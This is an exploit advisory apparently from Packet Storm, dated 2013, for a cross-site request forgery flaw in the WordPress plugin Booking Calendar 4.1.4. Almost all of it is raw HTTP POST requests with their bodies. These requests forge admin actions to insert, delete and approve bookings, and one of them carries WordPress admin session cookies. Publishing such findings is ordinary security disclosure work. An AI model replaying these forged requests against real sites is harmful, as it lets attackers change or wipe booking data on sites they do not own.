Booking Calendar 4.1.4 Cross Site Request Forgery

2013-08-06T00:00:00
ID PACKETSTORM:122691
Type packetstorm
Reporter Dylan Irzi
Modified 2013-08-06T00:00:00

Description

                                        
                                            `###########################################################################################  
# Exploit Title: CSRF Plugin Booking Calendar 4.1.4 – WordPress  
# Date: 04 de Agosto del 2013  
# Exploit Author: Dylan Irzi  
# Credit goes for: websecuritydev.com  
# Vendor Homepage: http://wpbookingcalendar.com/  
# Tested on: Win8 & Linux Mint  
# Affected Version : 4.1.4  
#  
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}  
# Greetz: all team WebSecuritydev.  
###########################################################################################  
CSRF VIA POST.  
  
Añadir nuevo.  
http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php  
  
POST:  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101  
Firefox/22.0 AlexaToolbar/alxf-2.18  
Accept: */*  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer:  
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation  
Content-Length: 311  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
-----------------------------------------------------------  
ajax_action=INSERT_INTO_TABLE&bktype=1&dates=19.07.2013&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email%5Eemail1%5Edylan.irzi%  
40gmail.com  
~text%5Ephone1%5Etest~textarea%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev_active_locale=es_ES  
  
---------------------------------------------------------  
---------------------------------------------------------  
  
Delete:  
Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php  
  
Post:  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101  
Firefox/22.0 AlexaToolbar/alxf-2.18  
Accept: */*  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer:  
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actions  
Content-Length: 104  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
  
---------------------------  
  
ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES  
  
---------------------------------------------------------  
---------------------------------------------------------  
<< Aprobar Evento >>  
URL: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php  
  
POST:  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101  
Firefox/22.0 AlexaToolbar/alxf-2.18  
Accept: */*  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Referer:  
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actions  
Content-Length: 128  
Cookie:  
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7C9f7f8aa8b2ea97a3464e6053c3c9f271;  
wp-settings-time-1=1373853874; wordpress_test_cookie=WP+Cookie+check;  
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7Cdd2c6fcb13e1f80327b123e484bd677b;  
PHPSESSID=ica6bf0tjnajr0r2rcc1se1fl0  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
---------------------------------------------------------  
ajax_action=UPDATE_APPROVE&booking_id=6&is_approve_or_pending=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES  
  
---------------------------------------------------------  
---------------------------------------------------------  
  
--   
*By Dylan Irzi  
@Dylan_Irzi11  
Pentest de Seguridad.  
WhiteHat.  
*  
`